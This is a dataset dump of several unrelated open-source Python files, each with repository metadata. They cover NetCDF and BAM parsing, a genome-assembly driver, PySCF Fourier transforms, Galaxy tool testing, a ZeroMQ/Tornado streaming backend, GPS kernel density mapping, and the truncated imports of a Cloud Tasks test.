bsd-3-clause
| 14,044
|
[
"RDKit"
] |
9bfa50a2641bd54f35e3fc2317fffaa7cb5b7d73e9c5b666457e753056c55079
|
import os
import numpy as np
from scipy.io.netcdf import netcdf_file
from netCDF4 import Dataset
def file2dict(filename):
if not os.path.isfile(filename):
raise ValueError("ERROR: Could not read %s" % filename)
nc = netcdf_file(filename, 'r', mmap=False)
ret = {}
for ikey in nc.variables.keys():
data = nc.variables[ikey].data
if type(data[0]) == np.float64:
if len(data) == 1:
data = float(data[0])
else:
data = [float(x) for x in data]
elif type(data[0]) == np.int32:
if len(data) == 1:
data = int(data[0])
else:
data = [int(x) for x in data]
else:
data = list(data)
ret[ikey] = data
del data
nc.close()
return ret
def netcdf2dict(filename):
"""
Read a NetCDF file and create a python dictionary with
numbers or lists for each variable
Args:
filename:
NetCDF filename
"""
if not os.path.isfile(filename):
print('ERROR: No such file: ', filename)
return None
ret = {}
netcdfile = netcdf_file(filename, 'r', mmap=False)
for ii in netcdfile.variables.keys():
ret[ii] = netcdfile.variables[ii][:]
netcdfile.close()
for i in ret:
if ret[i].dtype == np.dtype('>f8'):
ret[i] = [round(x, 11) for x in ret[i].flatten()]
elif ret[i].dtype == np.dtype('>i4'):
ret[i] = [int(x) for x in ret[i].flatten()]
for i in ret:
if len(ret[i]) == 1:
ret[i] = ret[i][0]
return ret
def netcdf4_to_dict(filename):
rootgrp = Dataset(filename, "r", format="NETCDF4")
ret={}
for var in rootgrp.variables:
ret[var]=list(rootgrp[var][:])
for i in ret:
if len(ret[i]) == 1:
ret[i] = ret[i][0]
rootgrp.close()
return ret
|
MaterialsDiscovery/PyChemia
|
pychemia/utils/netcdf.py
|
Python
|
mit
| 1,924
|
[
"NetCDF"
] |
2d337a3fe78efeaeebb78fe627fada8c1f559ba57424b39d7315170f8aa9dfd3
|
import pysam
import time
import scipy as sp
import sys
import os
import warnings
import pdb
from sets import Set
def get_counts_from_single_bam(fn_bam, regions):
"""This function extracts read counts from a given bam file spanning
a set of given intervals."""
if not os.path.exists(fn_bam + '.bai'):
#raise Exception('\nERROR: alignment file %s seems not to be indexed\n' % fn_bam)
warnings.warn('WARNING: alignment file %s seems not to be indexed and will be skipped! \n' % fn_bam)
dummy = sp.zeros(regions.shape[0] * 2)
dummy[:] = sp.nan
return dummy
if not os.stat(fn_bam).st_size > 0:
warnings.warn('WARNING: alignment file %s seems not to be empty and will be skipped! \n' % fn_bam)
dummy = sp.zeros(regions.shape[0] * 2)
dummy[:] = sp.nan
return dummy
samfile = pysam.Samfile(fn_bam, 'rb')
refseqs = samfile.references
cnts = []
t0 = time.time()
for i, rec in enumerate(regions):
if i > 0 and i % 100 == 0:
print '%i rounds to go. ETA %.0f seconds' % (regions.shape[0] - i, (time.time() - t0) / i * (regions.shape[0] - i))
if len(regions.shape) == 1:
chrm = rec.split(':')[0]
if not chrm in refseqs:
chrm = chrm.strip('chr')
start1 = int(rec.split(':')[1].split('-')[0])
end1 = int(rec.split(':')[1].split('-')[1])
start2 = None
end2 = None
else:
chrm = rec[0].split(':')[0]
if not chrm in refseqs:
chrm = chrm.strip('chr')
start1 = int(rec[0].split(':')[1].split('-')[0])
end1 = int(rec[0].split(':')[1].split('-')[1])
start2 = int(rec[1].split(':')[1].split('-')[0])
end2 = int(rec[1].split(':')[1].split('-')[1])
try:
#readids = Set([])
#dummy = [readids.add(read.query_name) for read in samfile.fetch(chrm, start1, end1) if not read.is_secondary]
#len(readids)
cnt1 = len([1 for read in samfile.fetch(chrm, start1, end1) if not read.is_secondary]) #Otherwise does not match firebrowse
if start2 is None:
cnt2 = cnt1
else:
readids = Set([])
dummy = [readids.add(read.query_name) for read in samfile.fetch(chrm, start1, end1) if not read.is_secondary]
cnt2 = len([1 for read in samfile.fetch(chrm, start1, end1) if not read.is_secondary]) #Otherwise does not match firebrowse
#cnt2 = len([1 for read in samfile.fetch(chrm, start2, end2) if not read.is_secondary])
#cnt1 = samfile.count(chrm, start1, end1)
#cnt2 = samfile.count(chrm, start2, end2)
except ValueError:
print >> sys.stderr, 'Ignored %s' % chrm
cnt1 = 1
cnt2 = 1
finally:
cnts.append([cnt1, cnt2])
samfile.close()
return sp.array(cnts, dtype='float').ravel('C')
def get_counts_from_multiple_bam(fn_bams, regions):
""" This is a wrapper to concatenate counts for a given list of bam
files"""
if len(fn_bams) == 1:
return get_counts_from_single_bam(fn_bams[0], regions)[:, sp.newaxis]
else:
return sp.hstack([get_counts_from_single_bam(fn_bams[i], regions)[:,sp.newaxis] for i in range(len(fn_bams))])
|
KjongLehmann/m53
|
libs/bam.py
|
Python
|
mit
| 3,463
|
[
"pysam"
] |
785f9702e29d54ebb44492a586aabb57387157f36931087eb70f21ee25f56908
|
#! /usr/bin/env python
"""Assembly execution drivers.
This module provides the default parameters and handling of
assembler-specific configurations.
Assembler defaults are set in the 'arast.conf' file
"""
import logging
import os
import re
import subprocess
import shutil
import glob
import metadata as meta
from ConfigParser import SafeConfigParser
def get_default(key):
"""Get assemblers default value from config file."""
return parser.get('assemblers', key)
def run(assembler, job_data):
plugin = self.pmanager.getPluginByName(assembler)
settings = plugin.details.items('Settings')
return plugin.plugin_object(settings, job_data)
def get_tar_name(job_id, suffix):
name = 'job' + str(job_id)
name += '_'
name += suffix
name += '.tar.gz'
return name
def tar(outpath, asm_data, tarname):
print "Compressing"
outfile = outpath + '/tar/'
try:
os.makedirs(outfile)
except:
pass
outfile += tarname
targs = ['tar', '-czvf', outfile, asm_data]
t = subprocess.Popen(targs)
t.wait()
return outfile
def tar_directory(outpath, directory, tarname):
outfile = outpath
try:
os.makedirs(outfile)
except:
pass
outfile += tarname
targs = ['tar', '-czvf', outfile, './']
t = subprocess.Popen(targs, cwd=directory)
t.wait()
return outfile
def tar_list(outpath, file_list, tarname):
""" Tars a file list. Attempts to find the highest common path"""
common_path = os.path.commonprefix(file_list)
outfile = outpath + '/tar/'
try: os.makedirs(outfile)
except: pass
outfile += tarname
targs = ['tar', '-czvf', outfile]
targs += [os.path.relpath(path, common_path) for path in file_list]
logging.debug("Tar command: %s: " % targs)
t = subprocess.Popen(targs, cwd=common_path)
t.wait()
return outfile
def ls_recursive(path):
""" Returns list of all files in a dir"""
allfiles = []
for root, sub_dirs, files in os.walk(path):
for f in files:
allfiles.append(os.path.join(root, f))
return allfiles
def prefix_file_move(file, prefix):
""" Adds prefix to file, returns new file name, moves file"""
if os.path.isdir(file):
return file
f = '/' + str(prefix) + '__' + os.path.basename(file)
newfile = os.path.split(file)[0] + f
os.rename(file, newfile)
return newfile
def prefix_file(file, prefix):
""" Adds prefix to file, returns new filename"""
if os.path.isdir(file):
return file
f = '/' + str(prefix) + '__' + os.path.basename(file)
newfile = os.path.split(file)[0] + f
return newfile
def rename_file_copy(filepath, newname):
""" Renames the file, keeping the file extension, copies to new file name"""
f = '/' + newname + '.' + os.path.basename(filepath).rsplit('.', 1)[1]
newfile = os.path.split(filepath)[0] + f
shutil.copy(filepath, newfile)
return newfile
def rename_file_symlink(filepath, newname):
""" Renames the file, keeping the file extension, symlinks to new file name"""
f = '/' + newname + '.' + os.path.basename(filepath).rsplit('.', 1)[1]
newfile = os.path.split(filepath)[0] + f
os.symlink(filepath, newfile)
return newfile
def get_fasta(directory):
""" Return the list of Fasta files in DIRECTORY
"""
files = os.listdir(directory)
fasta_files = [file for file in files
if re.search(r'\.fa$|\.fasta$', file, re.IGNORECASE) is not None]
return fasta_files
def get_fastq(directory):
""" Return the list of Fastq files in DIRECTORY
"""
files = os.listdir(directory)
fastq_files = [file for file in files
if re.search(r'\.fq$|\.fastq$', file, re.IGNORECASE) is not None]
return fastq_files
def get_quala(directory):
""" Return the list of Quala files in DIRECTORY
"""
files = os.listdir(directory)
quala_files = [file for file in files
if re.search(r'\.qa$|\.quala$', file, re.IGNORECASE) is not None]
return fastq_files
def read_config():
pass
def run_bwa(data_dir, ref_name, read_files, prefix):
""" Ex: run_bwa(velvet_data, 'contigs.fa', reads_list, 'velvet') """
bwa_exec = 'bwa'
samtools_exec = 'samtools'
tmp_files = []
ref_file = data_dir + ref_name
# Run the index on reference
bwa_args = [bwa_exec, 'index']
bwa_args.append(ref_file)
logging.info(bwa_args)
p_index = subprocess.Popen(bwa_args)
p_index.wait()
# Align reads to reference
bwa_args = [bwa_exec, 'aln']
bwa_args.append(ref_file)
if len(read_files) > 1:
# Concatenate read files
reads = data_dir + 'reads.fa'
destination = open(reads,'wb')
for rf in read_files:
logging.info("Concatenating read file: %s", rf)
shutil.copyfileobj(open(rf,'rb'), destination)
destination.close()
tmp_files.append(reads)
else:
reads = read_files[0]
bwa_args.append(reads)
aln_out = data_dir + prefix
aln_out += '_aln.sai'
aln_outbuffer = open(aln_out, 'wb')
tmp_files.append(aln_out)
bwa_args.append(aln_out)
logging.info(bwa_args)
p_aln = subprocess.Popen(bwa_args, stdout=aln_outbuffer)
p_aln.wait()
aln_outbuffer.close()
# Create Sam file
#bwa samse $ref $dir/aln-$refX$reads.sai $reads > $dir/aln-$refX$reads.sam
bwa_args = [bwa_exec, 'samse', ref_file, aln_out, reads]
sam_out = data_dir + prefix
sam_out += '_aln.sam'
sam_outbuffer = open(sam_out, 'wb')
tmp_files.append(sam_out)
bwa_args.append(sam_out)
logging.info(bwa_args)
p_sam = subprocess.Popen(bwa_args, stdout=sam_outbuffer)
p_sam.wait()
sam_outbuffer.close()
# Create bam file
# samtools view -S -b -o $dir/aln-$refX$reads.bam $dir/aln-$refX$reads.sam
samtools_args = [samtools_exec, 'view', '-S', '-b', '-o']
bam_out = data_dir + prefix
bam_out += '_aln.bam'
bam_outbuffer = open(bam_out, 'wb')
samtools_args.append(bam_out)
samtools_args.append(sam_out)
logging.info(samtools_args)
p_bam = subprocess.Popen(samtools_args, stdout=bam_outbuffer)
p_bam.wait()
bam_outbuffer.close()
for temp in tmp_files:
try:
os.remove(temp)
except:
logging.info("Could not remove %s" % temp)
return bam_out
def get_qual_encoding(file):
f = open(file, 'r')
while True:
bline = f.readline()
if bline.find('+') != -1: # Line before quality line
line = f.readline()
for c in line:
if ord(c) > 74:
logging.info("Detected phred64 quality encoding")
return 'phred64'
elif ord(c) < 64:
logging.info("Detected phred33 quality encoding")
return 'phred33'
if len(bline) == 0: #EOF
break
return
def tab_to_fasta(tabbed_file, outfile, threshold):
tabbed = open(tabbed_file, 'r')
fasta = open(outfile, 'w')
#prefixes = ['>_', ' len_', ' cov_', ' stdev_', ' GC_', '\n']
prefixes = ['>_', ' len_', ' cov_', ' stdev_', ' GC_', ' seed_', '\n']
for line in tabbed:
l = line.split('\t')
if int(l[1]) <= threshold:
for i in range(len(l)):
fasta.write(prefixes[i] + l[i])
tabbed.close()
fasta.close()
def arast_reads(filelist):
""" Returns a list of files into the ARAST reads dict format """
filedicts = []
for f in filelist:
filedicts.append({'type':'single', 'files':[f]})
return filedicts
parser = SafeConfigParser()
#parser.read('arast.conf')
#basepath = get_default('basepath')
#metadata = meta.MetadataConnection(parser.get('meta','mongo.remote.host'))
|
cbun/assembly
|
lib/assembly/assembly.py
|
Python
|
mit
| 7,846
|
[
"BWA"
] |
64129e204620fa9eea49a5d292df86378c43bc7b654dd4ac962ba255ab20c5d4
|
#!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
Analytic Fourier transformation AO-pair value for PBC
'''
import ctypes
import numpy
from pyscf import lib
from pyscf import gto
from pyscf.gto.ft_ao import ft_ao as mol_ft_ao
from pyscf.pbc.lib.kpts_helper import is_zero, gamma_point
libpbc = lib.load_library('libpbc')
#
# \int mu*nu*exp(-ik*r) dr
#
def ft_aopair(cell, Gv, shls_slice=None, aosym='s1',
b=None, gxyz=None, Gvbase=None, kpti_kptj=numpy.zeros((2,3)),
q=None, intor='GTO_ft_ovlp', comp=1, verbose=None):
r'''
FT transform AO pair
\sum_T exp(-i k_j * T) \int exp(-i(G+q)r) i(r) j(r-T) dr^3
'''
kpti, kptj = kpti_kptj
if q is None:
q = kptj - kpti
val = _ft_aopair_kpts(cell, Gv, shls_slice, aosym, b, gxyz, Gvbase,
q, kptj.reshape(1,3), intor, comp)
return val[0]
# NOTE buffer out must be initialized to 0
# gxyz is the index for Gvbase
def _ft_aopair_kpts(cell, Gv, shls_slice=None, aosym='s1',
b=None, gxyz=None, Gvbase=None, q=numpy.zeros(3),
kptjs=numpy.zeros((1,3)), intor='GTO_ft_ovlp', comp=1,
out=None):
r'''
FT transform AO pair
\sum_T exp(-i k_j * T) \int exp(-i(G+q)r) i(r) j(r-T) dr^3
The return array holds the AO pair
corresponding to the kpoints given by kptjs
'''
intor = cell._add_suffix(intor)
q = numpy.reshape(q, 3)
kptjs = numpy.asarray(kptjs, order='C').reshape(-1,3)
Gv = numpy.asarray(Gv, order='C').reshape(-1,3)
nGv = Gv.shape[0]
GvT = numpy.asarray(Gv.T, order='C')
GvT += q.reshape(-1,1)
if (gxyz is None or b is None or Gvbase is None or (abs(q).sum() > 1e-9)
# backward compatibility for pyscf-1.2, in which the argument Gvbase is gs
or (Gvbase is not None and isinstance(Gvbase[0], (int, numpy.integer)))):
p_gxyzT = lib.c_null_ptr()
p_mesh = (ctypes.c_int*3)(0,0,0)
p_b = (ctypes.c_double*1)(0)
eval_gz = 'GTO_Gv_general'
else:
if abs(b-numpy.diag(b.diagonal())).sum() < 1e-8:
eval_gz = 'GTO_Gv_orth'
else:
eval_gz = 'GTO_Gv_nonorth'
gxyzT = numpy.asarray(gxyz.T, order='C', dtype=numpy.int32)
p_gxyzT = gxyzT.ctypes.data_as(ctypes.c_void_p)
b = numpy.hstack((b.ravel(), q) + Gvbase)
p_b = b.ctypes.data_as(ctypes.c_void_p)
p_mesh = (ctypes.c_int*3)(*[len(x) for x in Gvbase])
Ls = cell.get_lattice_Ls()
expkL = numpy.exp(1j * numpy.dot(kptjs, Ls.T))
atm, bas, env = gto.conc_env(cell._atm, cell._bas, cell._env,
cell._atm, cell._bas, cell._env)
ao_loc = gto.moleintor.make_loc(bas, intor)
if shls_slice is None:
shls_slice = (0, cell.nbas, cell.nbas, cell.nbas*2)
else:
shls_slice = (shls_slice[0], shls_slice[1],
cell.nbas+shls_slice[2], cell.nbas+shls_slice[3])
ni = ao_loc[shls_slice[1]] - ao_loc[shls_slice[0]]
nj = ao_loc[shls_slice[3]] - ao_loc[shls_slice[2]]
nkpts = len(kptjs)
nimgs = len(Ls)
shape = (nkpts, comp, ni, nj, nGv)
# Theoretically, hermitian symmetry can be also found for kpti == kptj:
# f_ji(G) = \int f_ji exp(-iGr) = \int f_ij^* exp(-iGr) = [f_ij(-G)]^*
# hermi operation needs reordering the axis-0. It is inefficient.
if aosym == 's1hermi': # Symmetry for Gamma point
assert(is_zero(q) and is_zero(kptjs) and ni == nj)
elif aosym == 's2':
i0 = ao_loc[shls_slice[0]]
i1 = ao_loc[shls_slice[1]]
nij = i1*(i1+1)//2 - i0*(i0+1)//2
shape = (nkpts, comp, nij, nGv)
drv = libpbc.PBC_ft_latsum_drv
cintor = getattr(libpbc, intor)
eval_gz = getattr(libpbc, eval_gz)
if nkpts == 1:
fill = getattr(libpbc, 'PBC_ft_fill_nk1'+aosym)
else:
fill = getattr(libpbc, 'PBC_ft_fill_k'+aosym)
out = numpy.ndarray(shape, dtype=numpy.complex128, buffer=out)
drv(cintor, eval_gz, fill, out.ctypes.data_as(ctypes.c_void_p),
ctypes.c_int(nkpts), ctypes.c_int(comp), ctypes.c_int(nimgs),
Ls.ctypes.data_as(ctypes.c_void_p), expkL.ctypes.data_as(ctypes.c_void_p),
(ctypes.c_int*4)(*shls_slice), ao_loc.ctypes.data_as(ctypes.c_void_p),
GvT.ctypes.data_as(ctypes.c_void_p), p_b, p_gxyzT, p_mesh, ctypes.c_int(nGv),
atm.ctypes.data_as(ctypes.c_void_p), ctypes.c_int(cell.natm),
bas.ctypes.data_as(ctypes.c_void_p), ctypes.c_int(cell.nbas),
env.ctypes.data_as(ctypes.c_void_p))
if aosym == 's1hermi':
for i in range(1,ni):
out[:,:,:i,i] = out[:,:,i,:i]
out = numpy.rollaxis(out, -1, 2)
if comp == 1:
out = out[:,0]
return out
def ft_ao(mol, Gv, shls_slice=None, b=None,
gxyz=None, Gvbase=None, kpt=numpy.zeros(3), verbose=None):
if gamma_point(kpt):
return mol_ft_ao(mol, Gv, shls_slice, b, gxyz, Gvbase, verbose)
else:
kG = Gv + kpt
return mol_ft_ao(mol, kG, shls_slice, None, None, None, verbose)
if __name__ == '__main__':
import pyscf.pbc.gto as pgto
import pyscf.dft.numint
from pyscf.pbc import tools
L = 5.
n = 20
cell = pgto.Cell()
cell.a = numpy.diag([L,L,L])
cell.mesh = numpy.array([n,n,n])
cell.atom = '''C 1.3 .2 .3
C .1 .1 1.1
'''
cell.basis = 'ccpvdz'
#cell.basis = {'C': [[0, (2.4, .1, .6), (1.0,.8, .4)], [1, (1.1, 1)]]}
#cell.basis = {'C': [[0, (2.4, 1)]]}
cell.unit = 'B'
#cell.verbose = 4
cell.build(0,0)
#cell.nimgs = (2,2,2)
ao2 = ft_aopair(cell, cell.Gv)
nao = cell.nao_nr()
coords = pyscf.pbc.dft.gen_grid.gen_uniform_grids(cell)
aoR = cell.pbc_eval_gto('GTOval', coords)
aoR2 = numpy.einsum('ki,kj->kij', aoR.conj(), aoR)
ngrids = aoR.shape[0]
for i in range(nao):
for j in range(nao):
ao2ref = tools.fft(aoR2[:,i,j], cell.mesh) * cell.vol/ngrids
print(i, j, numpy.linalg.norm(ao2ref - ao2[:,i,j]))
aoG = ft_ao(cell, cell.Gv)
for i in range(nao):
aoref = tools.fft(aoR[:,i], cell.mesh) * cell.vol/ngrids
print(i, numpy.linalg.norm(aoref - aoG[:,i]))
|
gkc1000/pyscf
|
pyscf/pbc/df/ft_ao.py
|
Python
|
apache-2.0
| 6,876
|
[
"PySCF"
] |
f9681443bedb96a9bfb3052981719e9046ef5b9060e1b58f38fb777bd4de6c59
|
import new, sys
import galaxy.util
import parameters
from parameters import basic
from parameters import grouping
from elementtree.ElementTree import XML
class ToolTestBuilder( object ):
"""
Encapsulates information about a tool test, and allows creation of a
dynamic TestCase class (the unittest framework is very class oriented,
doing dynamic tests in this was allows better integration)
"""
def __init__( self, tool, name ):
self.tool = tool
self.name = name
self.required_files = []
self.inputs = []
self.outputs = []
self.error = False
self.exception = None
def add_param( self, name, value, extra ):
try:
if name not in self.tool.inputs:
for input_name, input_value in self.tool.inputs.items():
if isinstance( input_value, grouping.Conditional ) or isinstance( input_value, grouping.Repeat ):
self.__expand_grouping_for_data_input(name, value, extra, input_name, input_value)
elif isinstance( self.tool.inputs[name], parameters.DataToolParameter ):
self.required_files.append( ( value, extra ) )
except: pass
self.inputs.append( ( name, value, extra ) )
def add_output( self, name, file ):
self.outputs.append( ( name, file ) )
def __expand_grouping_for_data_input( self, name, value, extra, grouping_name, grouping_value ):
# Currently handles grouping.Conditional and grouping.Repeat
if isinstance( grouping_value, grouping.Conditional ):
if name != grouping_value.test_param.name:
for case in grouping_value.cases:
for case_input_name, case_input_value in case.inputs.items():
if case_input_name == name and isinstance( case_input_value, basic.DataToolParameter ):
self.required_files.append( ( value, extra ) )
return True
elif isinstance( case_input_value, grouping.Conditional ):
self.__expand_grouping_for_data_input(name, value, extra, case_input_name, case_input_value)
elif isinstance( grouping_value, grouping.Repeat ):
# FIXME: grouping.Repeat can only handle 1 repeat param element since the param name
# is something like "input2" and the expanded page display is something like "queries_0|input2".
# The problem is that the only param name on the page is "input2", and adding more test input params
# with the same name ( "input2" ) is not yet supported in our test code ( the lat one added is the only
# one used ).
for input_name, input_value in grouping_value.inputs.items():
if input_name == name and isinstance( input_value, basic.DataToolParameter ):
self.required_files.append( ( value, extra ) )
return True
|
dbcls/dbcls-galaxy
|
lib/galaxy/tools/test.py
|
Python
|
mit
| 2,997
|
[
"Galaxy"
] |
06b06591f5793691f23800da59fdecf7d6f1d897864227b9ea38d9dd3b23e2e4
|
"""A backend request handler process.
This file uses zmq.web to implement the backend logic for load balanced
Tornado request handlers.
This version uses a streaming message protocol to enable the backend to send
the HTTP body back to the frontend/browser in multiple asynchronous chunks.
To enable streaming mode, you have to use ZMQStreamingApplicationProxy in
the frontend and ZMQStreamingHTTPRequest in the backend.
To run this example:
* Start one instance of frontend_stream.py.
* Start one or more instances of backend_stream.py.
* Hit the URLs http://127.0.0.1:8888/foo and http://127.0.0.1:8888/foo/sleep?t=1.
The t parameter of this last URL can be changed to something greater than 10 to
observe the timeout behavior.
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2012 Brian Granger, Min Ragan-Kelley
#
# Distributed under the terms of the New BSD License. The full license is in
# the file COPYING.BSD, distributed as part of this software.
#-----------------------------------------------------------------------------
import logging
logging.basicConfig(level=logging.DEBUG)
import time
from zmq.eventloop import ioloop
ioloop.install()
from tornado import web
from zmqweb import ZMQApplication, ZMQStreamingHTTPRequest
def flush_callback():
logging.info('Done flushing zmq buffers')
class FooHandler(web.RequestHandler):
@web.asynchronous
def get(self):
self.set_header('Handler', 'FooHandler')
# Each write/flush pair is send back to the frontend/browser immediately.
self.write('pow\n')
self.flush(callback=flush_callback)
self.bam_count = 10
def bam_and_finish():
if self.bam_count>0:
# Each write/flush pair is send back to the frontend/browser immediately.
self.write('bam\n')
self.flush(callback=flush_callback)
self.bam_count -= 1
else:
self.bam_pc.stop()
# Calling finish sends a final message to finish the request.
self.finish()
self.bam_pc = ioloop.PeriodicCallback(bam_and_finish, 1000, ioloop.IOLoop.instance())
self.bam_pc.start()
class SleepHandler(web.RequestHandler):
def get(self):
t = float(self.get_argument('t',1.0))
time.sleep(t)
self.finish({'status':'awake','t':t})
application = ZMQApplication(
[
# A single ZMQApplication can run multiple request handlers, but the
# frontend must use a URL regular expression that matches all of the
# patterns in the backend.
(r"/foo", FooHandler),
(r"/foo/sleep", SleepHandler)
],
# To use streaming replies, we set need to http_request_class to
# ZMQStreamingHTTPRequest. The frontend needs to use
# ZMQStreamingApplicationProxy in this case.
http_request_class=ZMQStreamingHTTPRequest
)
# Connect to the frontend on port 5555.
application.connect('tcp://127.0.0.1:5555')
ioloop.IOLoop.instance().start()
|
ellisonbg/zmqweb
|
examples/backend_stream.py
|
Python
|
bsd-3-clause
| 3,064
|
[
"Brian"
] |
9bfab99f1b0c1f6de1894e29b43121cadaf07f94a94c57a9de66d7c8d42db67e
|
from erukar.system.engine import MaterialGood
class SalericiteCrystal(MaterialGood):
BaseName = "Salericite Crystal"
BriefDescription = "a chunk of crystalline salericite"
BasePricePerSingle = 118
WeightPerSingle = 0.6
|
etkirsch/legends-of-erukar
|
erukar/content/inventory/materials/raw/SalericiteCrystal.py
|
Python
|
agpl-3.0
| 236
|
[
"CRYSTAL"
] |
74ba7bec0b41e452696a7049ad685cb1053fdaa7583255de8786e204f146ec32
|
import cv
from math import atan2, sqrt, ceil, pi, fmod
import sys, getopt, os
from location import TripLoader
from pylibs import spatialfunclib
from itertools import tee, izip
import sqlite3
##
## important parameters
##
cell_size = 1 # meters
gaussian_blur = 17
trips_path = "trips/trips_1m/"
def pairwise(iterable):
"s -> (s0,s1), (s1,s2), (s2, s3), ..."
a, b = tee(iterable)
next(b, None)
return izip(a, b)
class KDE:
def __init__(self):
pass
def create_kde_with_trips(self, all_trips):
print "trips path: " + str(trips_path)
print "cell size: " + str(cell_size)
print "gaussian blur: " + str(gaussian_blur)
# flag to save images
save_images = True
sys.stdout.write("\nFinding bounding box... ")
sys.stdout.flush()
min_lat = all_trips[0].locations[0].latitude
max_lat = all_trips[0].locations[0].latitude
min_lon = all_trips[0].locations[0].longitude
max_lon = all_trips[0].locations[0].longitude
for trip in all_trips:
for location in trip.locations:
if (location.latitude < min_lat):
min_lat = location.latitude
if (location.latitude > max_lat):
max_lat = location.latitude
if (location.longitude < min_lon):
min_lon = location.longitude
if (location.longitude > max_lon):
max_lon = location.longitude
print "done."
# find bounding box for data
min_lat -= 0.003
max_lat += 0.003
min_lon -= 0.005
max_lon += 0.005
diff_lat = max_lat - min_lat
diff_lon = max_lon - min_lon
#print min_lat, min_lon, max_lat, max_lon
width = int(diff_lon * spatialfunclib.METERS_PER_DEGREE_LONGITUDE / cell_size)
height = int(diff_lat * spatialfunclib.METERS_PER_DEGREE_LATITUDE / cell_size)
yscale = height / diff_lat # pixels per lat
xscale = width / diff_lon # pixels per lon
# aggregate intensity map for all traces
themap = cv.CreateMat(height,width,cv.CV_16UC1)
cv.SetZero(themap)
##
## Build an aggregate intensity map from all the edges
##
trip_counter = 1
for trip in all_trips:
if ((trip_counter % 10 == 0) or (trip_counter == len(all_trips))):
sys.stdout.write("\rCreating histogram (trip " + str(trip_counter) + "/" + str(len(all_trips)) + ")... ")
sys.stdout.flush()
trip_counter += 1
temp = cv.CreateMat(height,width,cv.CV_8UC1)
cv.SetZero(temp)
temp16 = cv.CreateMat(height,width,cv.CV_16UC1)
cv.SetZero(temp16)
for (orig,dest) in pairwise(trip.locations):
oy = height - int(yscale * (orig.latitude - min_lat))
ox = int(xscale * (orig.longitude - min_lon))
dy = height - int(yscale * (dest.latitude - min_lat))
dx = int(xscale * (dest.longitude - min_lon))
cv.Line(temp, (ox, oy), (dx, dy), (32), 1, cv.CV_AA)
# accumulate trips into themap
cv.ConvertScale(temp,temp16,1,0)
cv.Add(themap,temp16,themap)
lines = cv.CreateMat(height,width,cv.CV_8U)
cv.SetZero(lines)
print "done."
trip_counter = 1
for trip in all_trips:
if ((trip_counter % 10 == 0) or (trip_counter == len(all_trips))):
sys.stdout.write("\rCreating drawing (trip " + str(trip_counter) + "/" + str(len(all_trips)) + ")... ")
sys.stdout.flush()
trip_counter += 1
for (orig, dest) in pairwise(trip.locations):
oy = height - int(yscale * (orig.latitude - min_lat))
ox = int(xscale * (orig.longitude - min_lon))
dy = height - int(yscale * (dest.latitude - min_lat))
dx = int(xscale * (dest.longitude - min_lon))
cv.Line(lines, (ox, oy), (dx, dy), (255), 1, cv.CV_AA)
# save the lines
cv.SaveImage("raw_data.png", lines)
print "done."
#print "Intensity map acquired."
sys.stdout.write("Smoothing... ")
sys.stdout.flush()
# # create the mask and compute the contour
cv.Smooth(themap, themap, cv.CV_GAUSSIAN, gaussian_blur, gaussian_blur)
cv.SaveImage("kde.png", themap)
print "done."
print "\nKDE generation complete."
if __name__ == '__main__':
opts,args = getopt.getopt(sys.argv[1:],"c:b:p:h")
for o,a in opts:
if o == "-c":
cell_size=int(a)
elif o == "-b":
gaussian_blur = int(a)
elif o == "-p":
trips_path = str(a)
elif o == "-h":
print "Usage: kde.py [-c <cell_size>] [-b <gaussian_blur_size>] [-p <trips_path>] [-h]\n"
sys.exit()
k = KDE()
k.create_kde_with_trips(TripLoader.load_all_trips(trips_path))
|
Vanuan/gpx_to_road_map
|
biagoni2012/kde.py
|
Python
|
apache-2.0
| 5,391
|
[
"Gaussian"
] |
8dd01698322f62506528116e0c7284e70a6c32e09b33e1ced9712c2891b120c5
|
"""
usage: dist-scramble.py <egg_name> [platform]
egg_name - The egg to scramble (as defined in eggs.ini)
platform - The platform to scramble on (as defined in
dist-eggs.ini). Leave blank for all.
Platform-inspecific eggs ignore this argument.
"""
import os, sys, logging
root = logging.getLogger()
root.setLevel( 10 )
root.addHandler( logging.StreamHandler( sys.stdout ) )
lib = os.path.abspath( os.path.join( os.path.dirname( __file__ ), "..", "lib" ) )
sys.path.append( lib )
from galaxy.eggs import DistCrate
if len( sys.argv ) > 3 or len( sys.argv ) < 2:
print __doc__
sys.exit( 1 )
elif len( sys.argv ) == 3:
c = DistCrate( sys.argv[2] )
else:
c = DistCrate()
c.parse()
egg_list = c.get( sys.argv[1] )
if egg_list is None:
print "error: %s not in eggs.ini" % sys.argv[1]
sys.exit( 1 )
failed = []
for egg in egg_list:
if not egg.scramble():
failed.append( egg.platform['galaxy'] )
if len( failed ):
print ""
print "Scramble failed to build eggs on the following platforms (more details"
print "can be found by reviewing the output above):"
print "\n".join( failed )
|
dbcls/dbcls-galaxy
|
scripts/dist-scramble.py
|
Python
|
mit
| 1,160
|
[
"Galaxy"
] |
88bc4b5c77c18dace29df039c17f41e8938728a80989776b8f6777402134d4f8
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.tasks_v2beta2.services.cloud_tasks import CloudTasksAsyncClient
from google.cloud.tasks_v2beta2.services.cloud_tasks import CloudTasksClient
from google.cloud.tasks_v2beta2.services.cloud_tasks import pagers
from google.cloud.tasks_v2beta2.services.cloud_tasks import transports
